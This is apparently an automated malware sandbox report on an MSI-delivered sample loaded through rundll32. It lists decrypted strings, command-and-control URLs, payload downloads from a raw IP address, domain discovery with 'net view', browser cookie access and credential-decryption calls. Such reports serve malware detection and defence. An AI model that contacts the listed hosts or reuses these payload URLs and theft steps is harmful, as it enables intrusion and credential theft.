Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &mac=
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: :%02x
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: PT0S
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &computername=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: &domain=%s
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: \*.dll
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: \Registry\Machine\
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: https://jarinamaers.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: https://startmast.shop/live/
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Desktop
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Startup
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Personal
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Local AppData
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: \update_data.dat
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: pN
Source: 5.2.rundll32.exe.235b5ce0000.2.unpack	String decryptor: URLS\|%d\|%s

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,		5_2_000000018003BC0C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010315E5C CryptUnprotectData,RtlDeleteBoundaryDescriptor,		6_3_0000018010315E5C

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI181.tmp, 00000003.00000000.1675686548.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp, 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmp, MSI181.tmp.1.dr, MSI103.tmp.1.dr, MSI846B.tmp.1.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000005.00000003.1681744394.00000235B5FA0000.00000040.00001000.00020000.00000000.sdmp, Update_cd47bedf.dll.5.dr, 360total.dll.1.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005BB02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_005BB02D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	5_2_00000235B5CEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	5_2_00000235B5CE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010316604 FindFirstFileA,FindNextFileA,	6_3_0000018010316604
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103116F4 FindFirstFileW,FindNextFileW,	6_3_00000180103116F4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_000001EF532BA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_000001EF532B1A08

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.46.75 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.197.34 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.219.28 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://startmast.shop/live/

Source: global traffic

HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAEJanOM/f8BEauEo6GRqguxLgAJt0LBh1uWaBD08sPTthnLouxyOeqq8UXC40zxYtXUeuLL3jc98oc4sgTt8Qg5RgpVyPUGOqQCdIMU+jHj5jPNgpCOYLzgjk7/68jQbYqRpL5buJGDaKHJUU4Qzi5sjC1iwUwrkBZLfklCNSWdGai+iykzR0ELnFD4lJb88vZch+TXuihcRzjbZvJG6mFONQPa3ignNQpsSbQgkMM4xuASI/kaIM+YTU5dBQE1SH8k0CwZj5Yc3H1S94NyGSn+DeuALqccEE8gt3uchW9hnkYs9tmlAQt7GBc9BBk/kSpz+oHgE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1714166482925Host: self.events.data.microsoft.comContent-Length: 7981Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236
Source: unknown	TCP traffic detected without corresponding DNS query: 146.19.106.236

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00000235B5CE8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

5_2_00000235B5CE8D90

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=ik1S2gvbzXRLjVdx_Y5LJh0w0S_9_5d6ElFayBg60ugD7-6XcInlKtnDSWxvnZdc6RsT5sEwwdujmxNFQp8EP2ZapVOyxYy_Jrmtb15X64AkKhQiB3isKEgC-YcetiMg65hoSKrHKE1skUTiedEtj1AIYbPY_8XEjWEE9T0CDLM
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-21; NID=513=UowfF3gRb-VEPPE7VIYxDTZwjoWg8ud9RDcXC8lTIuA_racxo5lcoiIPCNawi8P-2VoGw5HUUmmcSiDTYaOtK75Zr8F2x6a3xTaKMIWLcX8zMSUJcARngZXAUOfcFD7ay0O3J-Bpq4ODfH4oORUkZCP-9pENI39m6kruvf_I5S4
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=yd82sCgS4VfmnpY&MD=lpuKpd3X HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shop
Source: global traffic	HTTP traffic detected: GET /neo.msi HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows InstallerHost: 146.19.106.236

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic	DNS traffic detected: DNS query: grizmotras.com
Source: global traffic	DNS traffic detected: DNS query: pewwhranet.com

Source: unknown

